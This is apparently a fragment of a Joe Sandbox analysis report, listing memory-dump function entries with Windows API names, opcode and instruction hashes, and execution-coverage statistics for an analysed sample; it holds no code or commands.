                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1624746487.00007FFAAC750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac750000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 3fedfce642cab65482ed866e1a15812c967ab155343e81b41eebf6257546618b
                                                    • Instruction ID: 22efc98a94efc8c7f5db75d4306a0577fd52c57d2764efc44153a9850b727caa
                                                    • Opcode Fuzzy Hash: 3fedfce642cab65482ed866e1a15812c967ab155343e81b41eebf6257546618b
                                                    • Instruction Fuzzy Hash: 1F517B7090878C8FDB5ADFA8D855AE9BFB0EF56310F0481AFD049DB292CA349846CB51

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1624746487.00007FFAAC750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac750000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: SuspendThread
                                                    • String ID:
                                                    • API String ID: 3178671153-0
                                                    • Opcode ID: 9628fb853806b2e8f894f9ba1a5b532791a45eff33c428f0113c56ccee473631
                                                    • Instruction ID: 132fa55085975b158b93869373f854514b4e946b9b9aa40903120bca1c33ac88
                                                    • Opcode Fuzzy Hash: 9628fb853806b2e8f894f9ba1a5b532791a45eff33c428f0113c56ccee473631
                                                    • Instruction Fuzzy Hash: F7412A70D0864D8FDB98DFA8D885BEDBBF0FB5A310F10416AD049E7292DA74A845CF41

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1624746487.00007FFAAC750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac750000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 62c192db2082d2ae36dc0a5208f1d3410eedd09807d84cdf85f89591defd4d1b
                                                    • Instruction ID: b7212d95cb52aedf5207937404db9a33d1fe5760b71d943b122230f819065f5b
                                                    • Opcode Fuzzy Hash: 62c192db2082d2ae36dc0a5208f1d3410eedd09807d84cdf85f89591defd4d1b
                                                    • Instruction Fuzzy Hash: 0641F970D0864C8FDB98DF98D885BEDBBF0FB5A310F10816AD009E7252DA709845CF41

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem
                                                    • API String ID: 0-2156003729
                                                    • Opcode ID: 8de5cec29dab5bbcec48622f1cb14a5da55aa47e611025962dcbde6afc1637b2
                                                    • Instruction ID: f4597b177d0792b0cc2d68dca862196bb84065da8e683c66ec0c05c58bbc5cad
                                                    • Opcode Fuzzy Hash: 8de5cec29dab5bbcec48622f1cb14a5da55aa47e611025962dcbde6afc1637b2
                                                    • Instruction Fuzzy Hash: D0C1BF30A19546DBFB4DCF08C0D06B577A1FF46300B5485BDD86F8B68ACA38E889CB85

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5E5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E5000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5e5000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )I_H
                                                    • API String ID: 0-3323003358
                                                    • Opcode ID: 618ae6ffad49c99657d49d92f2f46db8822b144f81d332634cf0b17166181f34
                                                    • Instruction ID: 9494cf6b4fac182f2e9d964f2f4b47a4118d0e0e41f33694365f2c01490a8947
                                                    • Opcode Fuzzy Hash: 618ae6ffad49c99657d49d92f2f46db8822b144f81d332634cf0b17166181f34
                                                    • Instruction Fuzzy Hash: 3DC1FA70E08A5D8FDB94EF68C894BA9B7B6FF59300F5081A9D40DE7291CF34A985CB40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 721e151c99124c3f3356cbca6aae843ebe25f653a5bfa079b17e97dd66ed2878
                                                    • Instruction ID: aeb963e619daf6fb52f8df83b3be3a5b70476c868bbff0748c7577de1d08defe
                                                    • Opcode Fuzzy Hash: 721e151c99124c3f3356cbca6aae843ebe25f653a5bfa079b17e97dd66ed2878
                                                    • Instruction Fuzzy Hash: D2514D70E1960AEFEB89DB98C4645FDB7B1FF45300F1481BED01EA7291CA34A905CB81
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1624746487.00007FFAAC750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac750000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: dac1ab36c4050b565bc914f933276487376f30542cb67446cc6378c0cfe272c3
                                                    • Instruction ID: 8f8d4d77711b289436ba3a9957be7208e943ffdefd05fec4cccbb3c48a9d2898
                                                    • Opcode Fuzzy Hash: dac1ab36c4050b565bc914f933276487376f30542cb67446cc6378c0cfe272c3
                                                    • Instruction Fuzzy Hash: 3C415B70D0864C8FDB59DFA8D888BEDBBF0FF56310F1041AAD049E7292DA349885CB41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem
                                                    • API String ID: 0-2156003729
                                                    • Opcode ID: a31a4694b732bc88a67d79f88f7929fba687a323ee85ef643fb121dddca21ebd
                                                    • Instruction ID: c9302f8a5dc27c081f4c90c4b3d9604d2daae1e58d5e8900be0de7d0509689e9
                                                    • Opcode Fuzzy Hash: a31a4694b732bc88a67d79f88f7929fba687a323ee85ef643fb121dddca21ebd
                                                    • Instruction Fuzzy Hash: 43316171A1991AAFEB88DB5CD4915A8B7B1FF46310B50C13AD01FD7686CF24B816CBC1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem
                                                    • API String ID: 0-2156003729
                                                    • Opcode ID: 9233589f2c417a11548de27f8cbaa7b417a60a086e712d73a44080513639021f
                                                    • Instruction ID: cd5dce3fb893b4d37c85c50f6e8f0d2ac8f4eb552424086f5eef71dbb3701627
                                                    • Opcode Fuzzy Hash: 9233589f2c417a11548de27f8cbaa7b417a60a086e712d73a44080513639021f
                                                    • Instruction Fuzzy Hash: BD31C471E1DA4AEFF788976C94516E8B7E1FF46310F104179D06FC7182DE18A8498681
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 7
                                                    • API String ID: 0-1790921346
                                                    • Opcode ID: 8e387a078d0f69c83a00816ade96501b7dcfdcad8193d2422d1aec56cc11c428
                                                    • Instruction ID: 6246a7349bfa3d4b880125c59bea5b2832671f23bc11c76b41929501a9b20370
                                                    • Opcode Fuzzy Hash: 8e387a078d0f69c83a00816ade96501b7dcfdcad8193d2422d1aec56cc11c428
                                                    • Instruction Fuzzy Hash: CEF01C60D4911B8AEB609B18C850FAE7A65AF45700F5082F4E00D9B687DF78A9898AC0
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5b39379086fdf3a9d81d95c6e779423560556f3d5f533f15fe59b4e2a0be0ef1
                                                    • Instruction ID: e8729717dc7ded5c9b856c9cb32e7644e659a645dc53718db43ab4abc1c58e70
                                                    • Opcode Fuzzy Hash: 5b39379086fdf3a9d81d95c6e779423560556f3d5f533f15fe59b4e2a0be0ef1
                                                    • Instruction Fuzzy Hash: 53410570D1894D8FEB84EFA8C495AEDBBB1FF58301F10417AE40EE3255DB34A8518B90
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9038b6474639362994b911ad561b94f656a1a5ad77daa82191d85627b61be67d
                                                    • Instruction ID: cf7d68e1f360175a9ffdceab6ce67a0b0b7466693f369eaf77d1dfc5d839bfcd
                                                    • Opcode Fuzzy Hash: 9038b6474639362994b911ad561b94f656a1a5ad77daa82191d85627b61be67d
                                                    • Instruction Fuzzy Hash: 1741ED70959A1ACAEB64DB18C8446F97AF4EF5A311F5081F9D00DE2292EF34AA848F40
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a190526474998516d935aa01879f36fcd9c4b4b5e12b66250f569e37ad1aaadb
                                                    • Instruction ID: 07022cf4fd1d326cbc18507867b145c5bdf8c1062e484c978d6a4db4544ab628
                                                    • Opcode Fuzzy Hash: a190526474998516d935aa01879f36fcd9c4b4b5e12b66250f569e37ad1aaadb
                                                    • Instruction Fuzzy Hash: 61315B31A5A50AEFFBD8DB5884915BD77B0FF46300F50807AD42FD6581CA38E94887C1
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 471859c508ca6c2898e0d36185ca83d10885759ca5aee0469131c520694ad002
                                                    • Instruction ID: 7bedf4a6bd4bde1f5ccf72509a031ecada9c33b19277c50d25e10f80a3cf91ac
                                                    • Opcode Fuzzy Hash: 471859c508ca6c2898e0d36185ca83d10885759ca5aee0469131c520694ad002
                                                    • Instruction Fuzzy Hash: 07312910A2D596EAFB9A831C44607747BA1EF53301B18C6BED0AF8B4C7C85CE889C3D1
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1beaeedf82112731988d65a826c82d422123fa48ab016b34db512d4e17a48fb1
                                                    • Instruction ID: 2cdb10d2aa66a1c47a996ea325de4a8632aa9cf006dc044ffef1770c4f37fe5b
                                                    • Opcode Fuzzy Hash: 1beaeedf82112731988d65a826c82d422123fa48ab016b34db512d4e17a48fb1
                                                    • Instruction Fuzzy Hash: 9331C771D0852D8FDBA8EF14C854AE9B7F5FB68301F0081EA904EE3654CE75AAC58F81
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b616f2649fa25c757024e234ce1d6dcf86e839ff7aafe32e3a6d1e518b8fba8d
                                                    • Instruction ID: 75a7a46256ac1c3ad0f7a3d61e5d523a43c6e160d3a3beaad7bd1191bb91d9f8
                                                    • Opcode Fuzzy Hash: b616f2649fa25c757024e234ce1d6dcf86e839ff7aafe32e3a6d1e518b8fba8d
                                                    • Instruction Fuzzy Hash: C0112B21B1DF5D8FA7D8A71D141A1763BC1EB6A651B0102BFE41DC3392DD14DC0583C1
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3c2c00fab342e64312e4365fd6760f9565d1ae1f7acb5667ee3bfb4a88736a10
                                                    • Instruction ID: fc2f00a1a64fecbd5ff1ca52208f149cbded577d045847a2919398e026ff91e0
                                                    • Opcode Fuzzy Hash: 3c2c00fab342e64312e4365fd6760f9565d1ae1f7acb5667ee3bfb4a88736a10
                                                    • Instruction Fuzzy Hash: AB31CB70955A1DCEEB64DB18C8547EABBF5EF55342F4041E9E00DE2192EF349A84CF40
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0103e98b9a3d915e53b148810e9a999529e0a7009835fdacb9e3ba88fbe56a7f
                                                    • Instruction ID: 752eddad4d1d18799b1ba1c804b559f12ab30de5e95cfc2687f1e21a599af546
                                                    • Opcode Fuzzy Hash: 0103e98b9a3d915e53b148810e9a999529e0a7009835fdacb9e3ba88fbe56a7f
                                                    • Instruction Fuzzy Hash: 7921F6B6A0E68A8FF7129724C8151E9BBA0EF93310F04C5B2D0459B1D3EA386509CBD1
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 72016279e8cbdb66190eee4f9fd60c927338c37fa0a59f3e78ac08f7f5252385
                                                    • Instruction ID: b3cbc3f95d6bbfe93d7295bc8319cbb84f1356d98d743459fce77c2d989bfa07
                                                    • Opcode Fuzzy Hash: 72016279e8cbdb66190eee4f9fd60c927338c37fa0a59f3e78ac08f7f5252385
                                                    • Instruction Fuzzy Hash: 9011C232B1DF198FAAA4EB1C8805572BBE0FB6930171045AED04EC3661DA20FC0987C1
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d695fa6cc26d29ca9cedbdf6f55e3008722d593da02c83436726d447c54af5d2
                                                    • Instruction ID: 1f7db6cfc7c698e0aa378dd01b36fed11c33e90a54db39c224c97e61c16a4136
                                                    • Opcode Fuzzy Hash: d695fa6cc26d29ca9cedbdf6f55e3008722d593da02c83436726d447c54af5d2
                                                    • Instruction Fuzzy Hash: 1311DD7084D78A9FEB02DF2888064E97FF0EF16301F0581EBE458C71A2C63DA599C782
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 558a2eaa6d256645b309244e07677af7d900268863c7d407f0d6f6f84ec3d158
                                                    • Instruction ID: dc451eb824f5505bbb9288dcb9053f18848f9e52c8a1f94184eb83b750368d2a
                                                    • Opcode Fuzzy Hash: 558a2eaa6d256645b309244e07677af7d900268863c7d407f0d6f6f84ec3d158
                                                    • Instruction Fuzzy Hash: 3311E4B5A4E68ACEF7129B64D8151E9BFA4EF93320F0481B2D1499B1D3EB38650C87C1
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 56915e2e0d3822c8105cc69eaccda0818f4952c60b3f304db372823949c551ac
                                                    • Instruction ID: 26a7deb7340e1e6724e4a4d02906109fe453fcdadbb297f5ba686dd117459544
                                                    • Opcode Fuzzy Hash: 56915e2e0d3822c8105cc69eaccda0818f4952c60b3f304db372823949c551ac
                                                    • Instruction Fuzzy Hash: CD21E570859A2ECEEB64EB14CC547EAB6B1FB55342F0091E9D40DF2292EF746A84CF40
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7e5fe71cf4407825764a8aad994a0b754fb7812e8e2c771a49ba34bda38d0c13
                                                    • Instruction ID: 795f9f194764ec587cbc09a129aa4a4693ddba5b568881a1c23c268baaf56823
                                                    • Opcode Fuzzy Hash: 7e5fe71cf4407825764a8aad994a0b754fb7812e8e2c771a49ba34bda38d0c13
                                                    • Instruction Fuzzy Hash: 6821CC70859A29CEEB64DB14CC547FABAB4EF45342F4091F9D40DA2292EF74AAC4CF40
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5E5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E5000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5e5000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e85eb53bd43fc00e2df13fadb25fe5f4d5dde132d6b963dced44415bfed6f4ad
                                                    • Instruction ID: 79aec359900d8ead368895ee6c97b1a3505111da214cdcd7ae5f7b58c2a5f892
                                                    • Opcode Fuzzy Hash: e85eb53bd43fc00e2df13fadb25fe5f4d5dde132d6b963dced44415bfed6f4ad
                                                    • Instruction Fuzzy Hash: FB112A7080869D8FDF85EF68C859AEA7FF0FF29301F0545AAE409D7261DB349994CB81
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0af10b2c4f12c3f3a86d990eb14b670c182efb036165a37a82153419bb46f544
                                                    • Instruction ID: 3fa09776e8a75b933c1a6c46dd2d329115406a8920e6b37237e89f37cf3abaa9
                                                    • Opcode Fuzzy Hash: 0af10b2c4f12c3f3a86d990eb14b670c182efb036165a37a82153419bb46f544
                                                    • Instruction Fuzzy Hash: 5611053566864DCFCB49EF28C881AEAB7E0FF59304F0542AAE84DD7251D730E569CB81
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5E5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E5000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5e5000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 789730e6f4291a205bc2c4c61a0c294996d961e67d149dd2a3597dd71350b985
                                                    • Instruction ID: f700c99012ac9e0c043c660fd9bbf43e661543abb39dbcb668675d4853c7132c
                                                    • Opcode Fuzzy Hash: 789730e6f4291a205bc2c4c61a0c294996d961e67d149dd2a3597dd71350b985
                                                    • Instruction Fuzzy Hash: 3D113C70808A8D8FDF85EF68C859AAD7BF0FF29301F0445AAE418D71A1D734E544CB81
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2aa442d3c206490a17adc4bdaa06077e2e0730039d306486493929e8321c8b7f
                                                    • Instruction ID: 082abfb994767ff37860f5501a531f83d648134287b0a130be3c6cc3cae1b388
                                                    • Opcode Fuzzy Hash: 2aa442d3c206490a17adc4bdaa06077e2e0730039d306486493929e8321c8b7f
                                                    • Instruction Fuzzy Hash: F301003080968C8FEB41EB28C8151E97FB0EF56300F0440EAE01DC70A2EA35E948C781
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5E5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E5000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5e5000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6feee08107f1470400ed003a5894fed890ebe4209ee0138c1fb4c1aee86e36cb
                                                    • Instruction ID: fac9284892a471b495d88eb4356b9781b9c967c858d8fe5a51ea886a28137ae1
                                                    • Opcode Fuzzy Hash: 6feee08107f1470400ed003a5894fed890ebe4209ee0138c1fb4c1aee86e36cb
                                                    • Instruction Fuzzy Hash: E301D2B5C4E2899FEB95EF6884496AD7FA0EF15201F0441EAE40DC7052EA34E6588780
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 26b08072355687ac5b7ce586472ea1dd2457491a8099a18d56f96a4e7ee3aada
                                                    • Instruction ID: 01418549db0dd735309acc1dacf773bde20ce75764221bdc4465036b229d87bf
                                                    • Opcode Fuzzy Hash: 26b08072355687ac5b7ce586472ea1dd2457491a8099a18d56f96a4e7ee3aada
                                                    • Instruction Fuzzy Hash: 0911C6B590D28ACEF7069B64C8151A9BFB0EF93310F0481B6D045DB1D3DB38A508C7C1
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6d9a354ea3d9aff7c8e3bd410982b7fd805b36389ef5bd6033afe2f4b23db92b
                                                    • Instruction ID: af3b25d5cb01a61cf94bf48025dda59452fe8a9acb02794f583b65a4a2e5abc2
                                                    • Opcode Fuzzy Hash: 6d9a354ea3d9aff7c8e3bd410982b7fd805b36389ef5bd6033afe2f4b23db92b
                                                    • Instruction Fuzzy Hash: E801717090968C8FDB85DF18C455AAA7FB0FF65301F0540DAD408C71A1DB359959CB80
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e52283be2a784ba514b7a87249ff095fecf3f7ff09446e0898454524e998d795
                                                    • Instruction ID: e39812dfa907c8da99b96db1d630a2f4e9a6cce18e84db58df854701b7dd53b1
                                                    • Opcode Fuzzy Hash: e52283be2a784ba514b7a87249ff095fecf3f7ff09446e0898454524e998d795
                                                    • Instruction Fuzzy Hash: D3019370E1991DDEEBD4DF58D890BACB7B1FB69304F1081AAD01EE7250CA35A984CF54
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8048d6240020b6eabaa1613e0539c9ad85a6dc730704cffe416948976ea7914f
                                                    • Instruction ID: 318fc012f403dd64edf169e740772a817ae987264b90f491246d15bb54cbc0c2
                                                    • Opcode Fuzzy Hash: 8048d6240020b6eabaa1613e0539c9ad85a6dc730704cffe416948976ea7914f
                                                    • Instruction Fuzzy Hash: 5D017270909A1C9FDF98DF18D894FA8B7B1FB69304F10819AD04EE7250CB719A85CF44
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:

                                                    Execution Graph

                                                    Execution Coverage:5.1%
                                                    Dynamic/Decrypted Code Coverage:75%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:12
                                                    Total number of Limit Nodes:0
